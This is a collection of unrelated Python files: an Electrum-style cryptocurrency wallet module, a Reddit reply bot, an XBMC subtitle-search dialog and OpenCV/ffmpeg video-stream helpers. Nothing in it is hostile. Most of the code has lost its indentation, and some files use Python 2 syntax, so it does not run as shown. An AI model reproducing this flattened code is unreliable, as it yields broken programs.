def save_keystore(self):
pass
def load_addresses(self):
addresses = self.storage.get('addresses', [])
self.addresses = [Address.from_string(addr) for addr in addresses]
def save_addresses(self):
self.storage.put('addresses', [addr.to_storage_string()
for addr in self.addresses])
self.storage.write()
def can_change_password(self):
return False
def can_import_address(self):
return True
def get_addresses(self):
if not self._sorted:
self._sorted = sorted(self.addresses,
key=lambda addr: addr.to_full_ui_string())
return self._sorted
def import_address(self, address):
assert isinstance(address, Address)
if address in self.addresses:
return False
self.addresses.append(address)
self.add_address(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if already wrote in previous call
self._sorted = None
return True
def delete_address_derived(self, address):
self.addresses.remove(address)
self._sorted.remove(address)
def add_input_sig_info(self, txin, address):
x_pubkey = 'fd' + address.to_script_hex()
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
class ImportedPrivkeyWallet(ImportedWalletBase):
# wallet made of imported private keys
wallet_type = 'imported_privkey'
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
@classmethod
def from_text(cls, storage, text, password=None):
wallet = cls(storage)
storage.put('use_encryption', bool(password))
for privkey in text.split():
wallet.import_private_key(privkey, password)
return wallet
def is_watching_only(self):
return False
def get_keystores(self):
return [self.keystore]
def can_import_privkey(self):
return True
def load_keystore(self):
if self.storage.get('keystore'):
self.keystore = load_keystore(self.storage, 'keystore')
else:
self.keystore = Imported_KeyStore({})
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def load_addresses(self):
pass
def save_addresses(self):
pass
def can_change_password(self):
return True
def can_import_address(self):
return False
def get_addresses(self):
return self.keystore.get_addresses()
def delete_address_derived(self, address):
self.keystore.remove_address(address)
self.save_keystore()
def get_address_index(self, address):
return self.get_public_key(address)
def get_public_key(self, address):
return self.keystore.address_to_pubkey(address)
def import_private_key(self, sec, pw):
pubkey = self.keystore.import_privkey(sec, pw)
self.save_keystore()
self.add_address(pubkey.address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
return pubkey.address.to_full_ui_string()
def export_private_key(self, address, password):
'''Returned in WIF format.'''
pubkey = self.keystore.address_to_pubkey(address)
return self.keystore.export_private_key(pubkey, password)
def add_input_sig_info(self, txin, address):
assert txin['type'] == 'p2pkh'
pubkey = self.keystore.address_to_pubkey(address)
txin['num_sig'] = 1
txin['x_pubkeys'] = [pubkey.to_ui_string()]
txin['signatures'] = [None]
def pubkeys_to_address(self, pubkey):
pubkey = PublicKey.from_string(pubkey)
if pubkey in self.keystore.keypairs:
return pubkey.address
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def change_gap_limit(self, value):
'''This method is not called in the code, it is kept for console use'''
with self.lock:
if value >= self.gap_limit:
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
return True
elif value >= self.min_acceptable_gap():
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
n = len(addresses) - k + value
self.receiving_addresses = self.receiving_addresses[0:n]
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.save_addresses()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
'''This method isn't called anywhere. Perhaps it is here for console use.
Can't be sure. -Calin '''
with self.lock:
k = 0
for addr in reversed(addresses):
if addr in self._history:
break
k = k + 1
return k
def min_acceptable_gap(self):
''' Caller needs to hold self.lock otherwise bad things may happen. '''
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for a in addresses[0:-k]:
if a in self._history:
n = 0
else:
n += 1
if n > nmax: nmax = n
return nmax + 1
def create_new_address(self, for_change=False, save=True):
for_change = bool(for_change)
with self.lock:
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
if save:
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change, save=False)
continue
if all(map(lambda a: not self.address_is_old(a), addresses[-limit:] )):
break
else:
self.create_new_address(for_change, save=False)
def synchronize(self):
with self.lock:
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address, is_change):
with self.lock:
if is_change:
addr_list = self.get_change_addresses()
limit = self.gap_limit_for_change
else:
addr_list = self.get_receiving_addresses()
limit = self.gap_limit
idx = addr_list.index(address)
if idx < limit:
return False
for addr in addr_list[-limit:]:
if addr in self._history:
return False
return True
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def get_public_keys(self, address):
return [self.get_public_key(address)]
def add_input_sig_info(self, txin, address):
derivation = self.get_address_index(address)
x_pubkey = self.keystore.get_xpubkey(*derivation)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def pubkeys_to_address(self, pubkey):
return Address.from_pubkey(pubkey)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
gap_limit = 20
def __init__(self, storage):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage)
def get_pubkeys(self, c, i):
return self.derive_pubkeys(c, i)
def pubkeys_to_address(self, pubkeys):
pubkeys = [bytes.fromhex(pubkey) for pubkey in pubkeys]
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return Address.from_multisig_script(redeem_script)
def pubkeys_to_redeem_script(self, pubkeys):
return Script.multisig_script(self.m, sorted(pubkeys))
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i) for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bitcoin.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise bitcoin.InvalidPassword()
for name, keystore in self.keystores.items():
if keystore.can_change_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def has_seed(self):
return self.keystore.has_seed()
def can_change_password(self):
return self.keystore.can_change_password()
def is_watching_only(self):
return all(k.is_watching_only() for k in self.get_keystores())
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
def add_input_sig_info(self, txin, address):
# x_pubkeys are not sorted here because it would be too slow
# they are sorted in transaction.get_sorted_pubkeys
derivation = self.get_address_index(address)
txin['x_pubkeys'] = [k.get_xpubkey(*derivation) for k in self.get_keystores()]
txin['pubkeys'] = None
# we need n placeholders
txin['signatures'] = [None] * self.n
txin['num_sig'] = self.m
def is_multisig(self):
return True
wallet_types = ['standard', 'multisig', 'imported']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported_privkey': ImportedPrivkeyWallet,
'imported_addr': ImportedAddressWallet,
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
class UnknownWalletType(RuntimeError):
''' Raised if encountering an unknown wallet type '''
pass
# former WalletFactory
class Wallet:
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage):
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage)
# Convert hardware wallets restored with older versions of
# Electrum to BIP44 wallets. A hardware wallet does not have
# a seed and plugins do not need to handle having one.
rwc = getattr(wallet, 'restore_wallet_class', None)
if rwc and storage.get('seed', ''):
storage.print_error("converting wallet type to " + rwc.wallet_type)
storage.put('wallet_type', rwc.wallet_type)
wallet = rwc(storage)
return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise UnknownWalletType("Unknown wallet type: " + str(wallet_type))
def create_new_wallet(*, path, config, passphrase=None, password=None,
encrypt_file=True, seed_type=None, gap_limit=None) -> dict:
"""Create a new wallet"""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
if seed_type == 'electrum':
seed = mnemo.Mnemonic_Electrum('en').make_seed()
else:
seed = mnemo.make_bip39_words('english')
    k = keystore.from_seed(seed, passphrase, seed_type=seed_type)
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
storage.put('seed_type', seed_type)
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = "Please keep your seed in a safe place; if you lose it, you will not be able to restore your wallet."
wallet.storage.write()
return {'seed': seed, 'wallet': wallet, 'msg': msg}
def restore_wallet_from_text(text, *, path, config,
passphrase=None, password=None, encrypt_file=True,
gap_limit=None) -> dict:
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of bitcoin addresses
or bitcoin private keys."""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
text = text.strip()
if keystore.is_address_list(text):
wallet = ImportedAddressWallet.from_text(storage, text)
wallet.save_addresses()
    elif keystore.is_private_key_list(text):
k = keystore.Imported_KeyStore({})
storage.put('keystore', k.dump())
wallet = ImportedPrivkeyWallet.from_text(storage, text, password)
else:
if keystore.is_master_key(text):
k = keystore.from_master_key(text)
elif mnemo.is_seed(text):
k = keystore.from_seed(text, passphrase) # auto-detects seed type, preference order: old, electrum, bip39
else:
raise Exception("Seed or key not recognized")
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
seed_type = getattr(k, 'seed_type', None)
if seed_type:
storage.put('seed_type', seed_type) # Save, just in case
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = ("This wallet was restored offline. It may contain more addresses than displayed. "
"Start a daemon and use load_wallet to sync its history.")
wallet.storage.write()
return {'wallet': wallet, 'msg': msg}
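# Illustrative usage (editor's sketch, not part of the original module): creating a new
# standard wallet and restoring one from a seed phrase. The paths are placeholders and
# `config` stands for whatever configuration object the real callers pass in.
#
#   d = create_new_wallet(path="/tmp/new_wallet", config=config, password="secret")
#   print(d['seed'], d['msg'])
#
#   d = restore_wallet_from_text("<twelve word seed phrase>", path="/tmp/restored",
#                                config=config, password="secret")
#   wallet = d['wallet']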
|
commentroulette.py
|
import praw
import random
from threading import Thread
import time
import requests
from pprint import pprint  # used below when logging HTTPException details
r = praw.Reddit('comment_roulette '
                'Url:http://imtoopoorforaurl.com')
r.login()
def findNegCommentsAndDelete():
while(1):
comments = r.user.get_comments('new')
for comment in comments:
if(comment.score < 0):
comment.delete()
time.sleep(500)
thread = Thread(target = findNegCommentsAndDelete)
thread.start()
appendPhrase = '\n\n --------\n^[Huh?](https://www.reddit.com/r/comment_roulette/wiki/index) ^(I delete negative comments.)'
while True:
try:
print "checking...\n"
#Check my messages
for message in r.get_unread(unset_has_mail=True, update_user=True):
if("/u/comment_roulette" in message.body.lower()):
print "Got new message!"
parent = r.get_info(thing_id=message.parent_id)
file = open("responses.txt", 'r+')
responseOptions = file.read().splitlines()
message.reply(responseOptions[random.randrange(0,len(responseOptions))]+appendPhrase)
if(parent.author.name == "agreeswithmebot"):
quote = 'Uh oh, we got ourselves a smart guy here! Try again :)'
newComment = message.reply(quote)
user = message.author
r.send_message(user.name, 'AgreesWithMeBot', 'Hey, you seem pretty clever. Maybe contribute to our [github](https://github.com/jhaenchen/agreeswithmebot)?')
elif(isinstance(parent, praw.objects.Comment)):
messageText = parent.body
messageText = messageText.replace("/u/comment_roulette","")
messageText = messageText.replace("\n","\\n")
file.write(messageText + "\\n\\n -/u/" + message.author.name + "\n")
file.flush()
file.close()
message.mark_as_read()
print "sleeping..."
time.sleep(15)
except requests.exceptions.ReadTimeout:
print "Read timeout. Will try again."
except praw.errors.Forbidden:
        print "I'm banned from there."
user = message.author
message.mark_as_read()
        r.send_message(user.name, 'comment_roulette', 'Hey, I\'m banned from /r/'+message.subreddit.display_name+'. Sorry.')
except praw.errors.HTTPException as e:
pprint(vars(e))
print(e)
print "Http exception. Will try again."
except praw.errors.RateLimitExceeded as error:
print '\tSleeping for %d seconds' % error.sleep_time
time.sleep(error.sleep_time)
except requests.exceptions.ConnectionError:
print "ConnectionError. Will try again."
except praw.errors.APIException:
print "API exception. Will try again."
except (KeyboardInterrupt, SystemExit):
print "Safe exit..."
raise
except:
print "Unhandled exception, bail!"
r.send_message('therealjakeh', 'comment_roulette', 'Just went down! Help! Exception: ')
raise
|
gui.py
|
import sys
import os
import xbmc
import xbmcgui
import xbmcplugin
import threading
import socket
import urllib
from Queue import Queue
import plugins
import ConfigParser
import logging
import difflib
try: current_dlg_id = xbmcgui.getCurrentWindowDialogId()
except: current_dlg_id = 0
current_win_id = xbmcgui.getCurrentWindowId()
_ = sys.modules[ "__main__" ].__language__
__scriptname__ = sys.modules[ "__main__" ].__scriptname__
__version__ = sys.modules[ "__main__" ].__version__
STATUS_LABEL = 100
LOADING_IMAGE = 110
SUBTITLES_LIST = 120
trans_lang = {'aa' : 'Afar',
'ab' : 'Abkhaz',
'ae' : 'Avestan',
'af' : 'Afrikaans',
'ak' : 'Akan',
'am' : 'Amharic',
'an' : 'Aragonese',
'ar' : 'Arabic',
'as' : 'Assamese',
'av' : 'Avaric',
'ay' : 'Aymara',
'az' : 'Azerbaijani',
'ba' : 'Bashkir',
'be' : 'Belarusian',
'bg' : 'Bulgarian',
'bh' : 'Bihari',
'bi' : 'Bislama',
'bm' : 'Bambara',
'bn' : 'Bengali',
'bo' : 'Tibetan',
'br' : 'Breton',
'bs' : 'Bosnian',
'ca' : 'Catalan',
'ce' : 'Chechen',
'ch' : 'Chamorro',
'co' : 'Corsican',
'cr' : 'Cree',
'cs' : 'Czech',
'cu' : 'Old Church Slavonic',
'cv' : 'Chuvash',
'cy' : 'Welsh',
'da' : 'Danish',
'de' : 'German',
'dv' : 'Divehi',
'dz' : 'Dzongkha',
'ee' : 'Ewe',
'el' : 'Greek',
'en' : 'English',
'eo' : 'Esperanto',
'es' : 'Spanish',
'et' : 'Estonian',
'eu' : 'Basque',
'fa' : 'Persian',
'ff' : 'Fula',
'fi' : 'Finnish',
'fj' : 'Fijian',
'fo' : 'Faroese',
'fr' : 'French',
'fy' : 'Western Frisian',
'ga' : 'Irish',
'gd' : 'Scottish Gaelic',
'gl' : 'Galician',
'gn' : 'Guaraní',
'gu' : 'Gujarati',
'gv' : 'Manx',
'ha' : 'Hausa',
'he' : 'Hebrew',
'hi' : 'Hindi',
'ho' : 'Hiri Motu',
'hr' : 'Croatian',
'ht' : 'Haitian',
'hu' : 'Hungarian',
'hy' : 'Armenian',
'hz' : 'Herero',
'ia' : 'Interlingua',
'id' : 'Indonesian',
'ie' : 'Interlingue',
'ig' : 'Igbo',
'ii' : 'Nuosu',
'ik' : 'Inupiaq',
'io' : 'Ido',
'is' : 'Icelandic',
'it' : 'Italian',
'iu' : 'Inuktitut',
'ja' : 'Japanese (ja)',
'jv' : 'Javanese (jv)',
'ka' : 'Georgian',
'kg' : 'Kongo',
'ki' : 'Kikuyu',
'kj' : 'Kwanyama',
'kk' : 'Kazakh',
'kl' : 'Kalaallisut',
'km' : 'Khmer',
'kn' : 'Kannada',
'ko' : 'Korean',
'kr' : 'Kanuri',
'ks' : 'Kashmiri',
'ku' : 'Kurdish',
'kv' : 'Komi',
'kw' : 'Cornish',
'ky' : 'Kirghiz, Kyrgyz',
'la' : 'Latin',
'lb' : 'Luxembourgish',
'lg' : 'Luganda',
'li' : 'Limburgish',
'ln' : 'Lingala',
'lo' : 'Lao',
'lt' : 'Lithuanian',
'lu' : 'Luba-Katanga',
'lv' : 'Latvian',
'mg' : 'Malagasy',
'mh' : 'Marshallese',
'mi' : 'Maori',
'mk' : 'Macedonian',
'ml' : 'Malayalam',
'mn' : 'Mongolian',
'mr' : 'Marathi',
'ms' : 'Malay',
'mt' : 'Maltese',
'my' : 'Burmese',
'na' : 'Nauru',
              'nb' : 'Norwegian Bokmål',
'nd' : 'North Ndebele',
'ne' : 'Nepali',
'ng' : 'Ndonga',
'nl' : 'Dutch',
'nn' : 'Norwegian Nynorsk',
'no' : 'Norwegian',
'nr' : 'South Ndebele',
'nv' : 'Navajo, Navaho',
'ny' : 'Chichewa; Chewa; Nyanja',
'oc' : 'Occitan',
'oj' : 'Ojibwe, Ojibwa',
'om' : 'Oromo',
'or' : 'Oriya',
'os' : 'Ossetian, Ossetic',
'pa' : 'Panjabi, Punjabi',
'pi' : 'Pali',
'pl' : 'Polish',
'ps' : 'Pashto, Pushto',
'pt' : 'Portuguese',
'pb' : 'Brazilian',
'qu' : 'Quechua',
'rm' : 'Romansh',
'rn' : 'Kirundi',
'ro' : 'Romanian',
'ru' : 'Russian',
'rw' : 'Kinyarwanda',
'sa' : 'Sanskrit',
'sc' : 'Sardinian',
'sd' : 'Sindhi',
'se' : 'Northern Sami',
'sg' : 'Sango',
'si' : 'Sinhala, Sinhalese',
'sk' : 'Slovak',
'sl' : 'Slovene',
'sm' : 'Samoan',
'sn' : 'Shona',
'so' : 'Somali',
'sq' : 'Albanian',
'sr' : 'Serbian',
'ss' : 'Swati',
'st' : 'Southern Sotho',
'su' : 'Sundanese',
'sv' : 'Swedish',
'sw' : 'Swahili',
'ta' : 'Tamil',
'te' : 'Telugu',
'tg' : 'Tajik',
'th' : 'Thai',
'ti' : 'Tigrinya',
'tk' : 'Turkmen',
'tl' : 'Tagalog',
'tn' : 'Tswana',
'to' : 'Tonga',
'tr' : 'Turkish',
'ts' : 'Tsonga',
'tt' : 'Tatar',
'tw' : 'Twi',
'ty' : 'Tahitian',
'ug' : 'Uighur',
'uk' : 'Ukrainian',
'ur' : 'Urdu',
'uz' : 'Uzbek',
've' : 'Venda',
'vi' : 'Vietnamese',
'vo' : 'Volapük',
'wa' : 'Walloon',
'wo' : 'Wolof',
'xh' : 'Xhosa',
'yi' : 'Yiddish',
'yo' : 'Yoruba',
'za' : 'Zhuang, Chuang',
'zh' : 'Chinese',
'zu' : 'Zulu' }
SELECT_ITEM = ( 11, 256, 61453, )
EXIT_SCRIPT = ( 10, 247, 275, 61467, 216, 257, 61448, )
CANCEL_DIALOG = EXIT_SCRIPT + ( 216, 257, 61448, )
GET_EXCEPTION = ( 216, 260, 61448, )
SELECT_BUTTON = ( 229, 259, 261, 61453, )
MOVEMENT_UP = ( 166, 270, 61478, )
MOVEMENT_DOWN = ( 167, 271, 61480, )
DEBUG_MODE = 5
# Log status codes
LOG_INFO, LOG_ERROR, LOG_NOTICE, LOG_DEBUG = range( 1, 5 )
def LOG( status, format, *args ):
if ( DEBUG_MODE >= status ):
xbmc.output( "%s: %s\n" % ( ( "INFO", "ERROR", "NOTICE", "DEBUG", )[ status - 1 ], format % args, ) )
def sort_inner(inner):
if("hash" in inner and inner["hash"] == True):
return 100
return inner["percent"]
class GUI( xbmcgui.WindowXMLDialog ):
socket.setdefaulttimeout(10.0) #seconds
def __init__( self, *args, **kwargs ):
pass
def set_filepath( self, path ):
LOG( LOG_INFO, "set_filepath [%s]" , ( path ) )
self.file_original_path = path
self.file_path = path[path.find(os.sep):len(path)]
def set_filehash( self, hash ):
LOG( LOG_INFO, "set_filehash [%s]" , ( hash ) )
self.file_hash = hash
def set_filesize( self, size ):
LOG( LOG_INFO, "set_filesize [%s]" , ( size ) )
self.file_size = size
def set_searchstring( self, search ):
LOG( LOG_INFO, "set_searchstring [%s]" , ( search ) )
self.search_string = search
def set_type( self, type ):
self.file_type = type
def onInit( self ):
LOG( LOG_INFO, "onInit" )
self.setup_all()
if self.file_path:
self.connThread = threading.Thread( target=self.connect, args=() )
self.connThread.start()
def setup_all( self ):
self.setup_variables()
def setup_variables( self ):
self.controlId = -1
self.allow_exception = False
if xbmc.Player().isPlayingVideo():
self.set_filepath( xbmc.Player().getPlayingFile() )
def connect( self ):
self.setup_all()
logging.basicConfig()
self.getControl( LOADING_IMAGE ).setVisible( True )
self.getControl( STATUS_LABEL ).setLabel( "Searching" )
sub_filename = os.path.basename(self.file_original_path)
title = sub_filename[0:sub_filename.rfind(".")]
        self.getControl( 180 ).setLabel("[B][UPPERCASE]$LOCALIZE[293]:[/B] " + title + "[/UPPERCASE]")
langs = None
subtitles = []
q = Queue()
self.config = ConfigParser.SafeConfigParser({"lang": "All", "plugins" : "BierDopje,OpenSubtitles", "tvplugins" : "BierDopje,OpenSubtitles", "movieplugins" : "OpenSubtitles" })
basepath = "/data/etc" # os.path.dirname(__file__)
self.config.read(basepath + "/.subtitles")
config_plugins = self.config.get("DEFAULT", "plugins")
if(self.file_type == "tv"):
config_plugins = self.config.get("DEFAULT", "tvplugins")
elif(self.file_type == "movie"):
config_plugins = self.config.get("DEFAULT", "movieplugins")
use_plugins = map(lambda x : x.strip(), config_plugins.split(","))
config_langs = self.config.get("DEFAULT", "lang")
if(config_langs != "All" and config_langs != ""):
use_langs = map(lambda x : x.strip(), config_langs.split(","))
else:
use_langs = None
for name in use_plugins:
filep = self.file_original_path
try :
plugin = getattr(plugins, name)(self.config, '/data/hack/cache')
LOG( LOG_INFO, "Searching on %s ", (name) )
thread = threading.Thread(target=plugin.searchInThread, args=(q, str(filep), use_langs))
thread.start()
except ImportError, (e) :
LOG( LOG_INFO, "Plugin %s is not a valid plugin name. Skipping it.", ( e) )
# Get data from the queue and wait till we have a result
count = 0
for name in use_plugins:
subs = q.get(True)
count = count + 1
self.getControl( STATUS_LABEL ).setLabel( "Searching " + str(count) + "/" + str(len(use_plugins)) )
if subs and len(subs) > 0:
if not use_langs:
subtitles += subs
else:
for sub in subs:
lang_code = sub["lang"]
if(lang_code == "pt-br"):
lang_code = "pb"
if lang_code in use_langs:
subtitles += [sub]
if(len(subtitles) > 0):
self.sublist = subtitles
for item in subtitles:
sub_filename = os.path.basename( self.file_original_path )
sub_filename = sub_filename[0:sub_filename.rfind(".")]
percent = (round(difflib.SequenceMatcher(None, sub_filename, item["release"]).ratio(), 2) * 100)
item["percent"] = percent
subtitles.sort(key=sort_inner,reverse=True)
for item in subtitles:
if(item["lang"] and item["release"]):
if(item["lang"] == "pt-br"):
item["lang"] = "pb"
if(item["lang"] in trans_lang):
language = trans_lang[item["lang"]]
else:
language = item["lang"]
listitem = xbmcgui.ListItem( label=language, label2=item["release"], iconImage="0.0", thumbnailImage="flags/" + item["lang"] + ".png" )
listitem.setProperty( "source", str(item["plugin"].__class__.__name__))
listitem.setProperty( "release", item["release"])
listitem.setProperty( "equals", str(item["percent"]) + "%")
if("hash" in item and item["hash"] == True):
listitem.setProperty( "sync", "true" )
else:
listitem.setProperty( "sync", "false" )
self.getControl( SUBTITLES_LIST ).addItem( listitem )
self.setFocus( self.getControl( SUBTITLES_LIST ) )
self.getControl( SUBTITLES_LIST ).selectItem( 0 )
self.getControl( LOADING_IMAGE ).setVisible( False )
self.getControl( STATUS_LABEL ).setVisible( False )
def download_subtitles(self, pos):
if self.sublist:
item = self.sublist[pos]
ok = xbmcgui.Dialog().yesno( "BoxeeSubs", _( 242 ), ( _( 243 ) % ( item["release"], ) ), "", _( 260 ), _( 259 ) )
if not ok:
self.getControl( STATUS_LABEL ).setLabel( _( 645 ) )
return
else:
local_path = xbmc.translatePath("special://home/subtitles")
dp = xbmcgui.DialogProgress()
dp.create( __scriptname__, _( 633 ), os.path.basename( self.file_path ) )
sub_filename = os.path.basename( self.file_path )
sub_filename = sub_filename[0:sub_filename.rfind(".")] + "." + item["lang"] + ".srt"
item["plugin"].downloadFile(item["link"], os.path.join( local_path, sub_filename ))
dp.close()
xbmc.Player().setSubtitles( os.path.join( local_path, sub_filename ) )
xbmc.showNotification( 652, '', '' )
self.getControl( STATUS_LABEL ).setLabel( _( 652 ) )
self.getControl( STATUS_LABEL ).setLabel( _( 649 ) )
self.exit_script()
def exit_script( self, restart=False ):
self.connThread.join()
self.close()
def onClick( self, controlId ):
if ( self.controlId == SUBTITLES_LIST ):
self.download_subtitles( self.getControl( SUBTITLES_LIST ).getSelectedPosition() )
def onFocus( self, controlId ):
self.controlId = controlId
def onAction( self, action ):
try:
if ( action.getButtonCode() in CANCEL_DIALOG ):
self.exit_script()
except:
self.exit_script()
|
app_utils.py
|
# import the necessary packages
import struct
import six
import collections
import cv2
import datetime
import subprocess as sp
import json
import numpy
import time
from matplotlib import colors
from threading import Thread
class FPS:
def __init__(self):
# store the start time, end time, and total number of frames
# that were examined between the start and end intervals
self._start = None
self._end = None
self._numFrames = 0
def start(self):
# start the timer
self._start = datetime.datetime.now()
return self
def stop(self):
# stop the timer
self._end = datetime.datetime.now()
def update(self):
# increment the total number of frames examined during the
# start and end intervals
self._numFrames += 1
def elapsed(self):
# return the total number of seconds between the start and
# end interval
return (self._end - self._start).total_seconds()
def fps(self):
# compute the (approximate) frames per second
return self._numFrames / self.elapsed()
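# Illustrative usage (editor's note): the FPS helper brackets a processing loop;
# call update() once per frame, then read fps() after stop().
#
#   fps = FPS().start()
#   for _ in range(120):
#       # ... process one frame ...
#       fps.update()
#   fps.stop()
#   print("elapsed: {:.2f}s, approx. FPS: {:.2f}".format(fps.elapsed(), fps.fps()))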
class WebcamVideoStream:
def __init__(self, src=0):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.grabbed, self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
def getWidth(self):
# Get the width of the frames
return int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH))
def getHeight(self):
# Get the height of the frames
return int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT))
def getFPS(self):
# Get the frame rate of the frames
return int(self.stream.get(cv2.CAP_PROP_FPS))
    def isOpen(self):
        # Check whether the capture stream was opened successfully
        return self.stream.isOpened()
def setFramePosition(self, framePos):
self.stream.set(cv2.CAP_PROP_POS_FRAMES, framePos)
def getFramePosition(self):
return int(self.stream.get(cv2.CAP_PROP_POS_FRAMES))
def getFrameCount(self):
return int(self.stream.get(cv2.CAP_PROP_FRAME_COUNT))
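# Illustrative usage (editor's note): the reader runs in a background thread, so read()
# always returns the most recently grabbed frame without blocking on capture.
#
#   vs = WebcamVideoStream(src=0).start()
#   grabbed, frame = vs.read()
#   if grabbed:
#       print(vs.getWidth(), vs.getHeight(), vs.getFPS())
#   vs.stop()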
class HLSVideoStream:
def __init__(self, src):
# initialize the video camera stream and read the first frame
# from the stream
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
FFMPEG_BIN = "ffmpeg"
metadata = {}
        # Poll ffprobe until the stream's metadata becomes available
        while "streams" not in metadata.keys():
            info = sp.Popen(["ffprobe",
                             "-v", "quiet",
                             "-print_format", "json",
                             "-show_format",
                             "-show_streams", src],
                            stdin=sp.PIPE, stdout=sp.PIPE, stderr=sp.PIPE)
            out, err = info.communicate()
            metadata = json.loads(out.decode('utf-8'))
            if "streams" not in metadata.keys():
                print('ERROR: Could not access stream. Trying again.')
                time.sleep(5)
        print('SUCCESS: Retrieved stream metadata.')
self.WIDTH = metadata["streams"][0]["width"]
self.HEIGHT = metadata["streams"][0]["height"]
self.pipe = sp.Popen([ FFMPEG_BIN, "-i", src,
"-loglevel", "quiet", # no text output
"-an", # disable audio
"-f", "image2pipe",
"-pix_fmt", "bgr24",
"-vcodec", "rawvideo", "-"],
stdin = sp.PIPE, stdout = sp.PIPE)
print('WIDTH: ', self.WIDTH)
